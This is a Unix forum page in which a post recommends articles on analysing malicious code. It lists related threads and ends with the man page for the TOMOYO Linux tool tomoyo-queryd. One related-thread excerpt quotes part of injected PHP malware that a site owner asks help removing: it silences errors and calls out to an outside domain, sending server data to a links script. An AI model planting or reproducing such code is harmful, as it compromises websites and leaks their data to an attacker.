Login or Register to Ask a Question and Join Our Community

Sponsored Content
Full Discussion: How to analyze malicious code
Special Forums Cybersecurity How to analyze malicious code Post 302442540 by pludi on Wednesday 4th of August 2010 03:41:24 PM
Old 08-04-2010
How to analyze malicious code
A series on The H about analyzing potentially malicious code flying around on the net. Pretty well written, and a nice read for those interested in how exploits work:
  1. CSI:Internet - Alarm at the pizza service
  2. CSI:Internet - The image of death
  3. CSI:Internet - PDF timebomb
  4. CSI:Internet - Attack of the killer videos
These 2 Users Gave Thanks to pludi For This Post:
Neo pumpkin
 

8 More Discussions You Might Find Interesting

1. Shell Programming and Scripting

Analyze Statistics

I have a file which contains records in the format of 2006-08-25 12:06:13|ABC|93 2006-08-25 12:45:55|ABC|203 2006-08-25 01:48:19|DEF|156 2006-08-25 01:49:09|ABC|12798 2006-08-25 02:49:59|GHL|4109 2006-08-25 03:50:50|DEF|234 where the format is "arrive time"|"message type"|"processing... (3 Replies)
Discussion started by: mpang_
3 Replies

2. Shell Programming and Scripting

remove malicious codes from a file

Hello, Please advise a script/command to remove the following line for a file <?php error_reporting(0); $fn = "googlesindication.cn"; $fp = fsockopen($fn, 80, $errno, $errstr, 15); if (!$fp) { } else { $query='site='.$_SERVER; $out = "GET /links.php?".$query." HTTP/1.1\r\n"; ... (5 Replies)
Discussion started by: fed.linuxgossip
5 Replies

3. Solaris

How to analyze the outcome of patchdiag

Hi Gurus, I have installed the stuff needed for patchdiag for patching, its working okay , however after execution of pathcdiag.sparc i am unable to understand the summury which is produced at the end. Please help ! Thanks (3 Replies)
Discussion started by: kumarmani
3 Replies

4. Shell Programming and Scripting

Anti-malicious files and viruses

Hello I ask you how to make a Anti-malicious files and viruses Or if one of you a small example of the work on the same place and I hope my request I want a small patch or the process of examination Virus http://www.google.jo/images/cleardot.gif ---------- Post updated... (1 Reply)
Discussion started by: x-zer0
1 Replies

5. Programming

Using c++ to analyze two file problem

Hi, I have two files: Input_file1.txt 124 235 152 178 156 142 178 163 159 Input_file2.txt 124|5623 452|6698 178|9995 235|7542 159|8852 (1 Reply)
Discussion started by: cpp_beginner
1 Replies

6. Solaris

Snapshot analyze

Hi, Is there any tool is available for analyzing Oracle X86 snapshot output. Thanks in advance. (1 Reply)
Discussion started by: sunnybee
1 Replies

7. Shell Programming and Scripting

Malicious pl script, what does it do

Hello, i found and malicious looking script on my server, here is its code safelly pasted as a text on pastebin: Posting links to pastebin scripts are forbidden at this site. Please what does this script do? It has .pl extension and is on shared cpanel hosting account (1 Reply)
Discussion started by: postcd
1 Replies

8. Debian

Malicious perl script

Relative newbie to Linux so please be kind and assume I've done little in the way of command line but i have been thrusted into this position. Here goes. There is a perl script on my box that is using me as a mail server. It is contacting other mail servers to the point of slowing down the box.... (20 Replies)
Discussion started by: dadprpus
20 Replies

LEARN ABOUT DEBIAN

tomoyo-queryd

TOMOYO-QUERYD(8)					  System Administration Utilities					  TOMOYO-QUERYD(8)

NAME

       tomoyo-queryd - real-time access request management utility for TOMOYO Linux

SYNOPSIS

       tomoyo-queryd

       tomoyo-queryd [remote_ip:remote_port]

DESCRIPTION

       This program detects policy violations that occur in domains set to enforcing mode. The violation is displayed and a number of options are
       given to either grant or reject this request. Programs are frozen until a response is provided by the administrator.

       This is useful when upgrading packages on the system, as errors due to changes in permissions can be avoided.

       Carefully analyze access requests before you grant them, as they could be coming from a compromised process or malicious attacker.

       Before this program can be invoked, you must register it in /sys/kernel/security/tomoyo/manager. After initializing policy, this is usually
       as simple as rebooting the system.

OPTIONS

       remote_ip:remote_port
	   Instead of managing local policy violations, manage remote policy via an agent waiting at port remote_port on IP address remote_ip.

EXAMPLES

       Handle policy violations on the local system
	     tomoyo-queryd

       Handle policy violations on a remote system
	     tomoyo-queryd 192.168.1.1:10000

BUGS

       If you find any bugs, send an email to <tomoyo-users-en@lists.sourceforge.jp>.

AUTHORS

       Tetsuo Handa <penguin-kernel@I-love.SAKURA.ne.jp>
	   Main author.

       Jamie Nguyen <jamie@tomoyolinux.co.uk>
	   Documentation and website.

SEE ALSO

       tomoyo-editpolicy-agent(8), tomoyo-notifyd(8)

       See <http://tomoyo.sourceforge.jp> for more information.

tomoyo-tools 2.5.0						    2012-04-14							  TOMOYO-QUERYD(8)
All times are GMT -4. The time now is 06:54 PM.
Unix & Linux Forums Content Copyright 1993-2022. All Rights Reserved.
Privacy Policy